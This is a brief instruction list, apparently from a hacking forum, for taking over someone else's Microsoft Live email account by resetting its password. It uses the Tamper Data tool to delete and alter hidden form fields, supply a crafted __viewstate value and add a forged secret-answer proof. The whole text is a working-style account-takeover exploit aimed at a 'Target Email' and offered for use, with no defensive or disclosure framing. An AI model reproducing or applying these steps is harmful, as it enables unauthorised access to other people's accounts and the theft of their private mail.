- Resetting an email
1) Go to this page
https://maccount.live.com/ac/resetpwdmain.aspx .
2) Enter the Target Email and enter the 6 characters you see.
3) Start Tamper Data
4) Delete Element "SendEmail_ContinueCmd"
5) change Element "__V_previousForm" to "ResetOptionForm"
6) Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW% 2Fak6gMIVsxSlDMZxkMkI"
7) Click O.K and Type THe new Password
8) sTart TamperDaTa and Add Element "__V_SecretAnswerProof" Proof not constant Like the old Exploit "++++" You need new Proof Every Time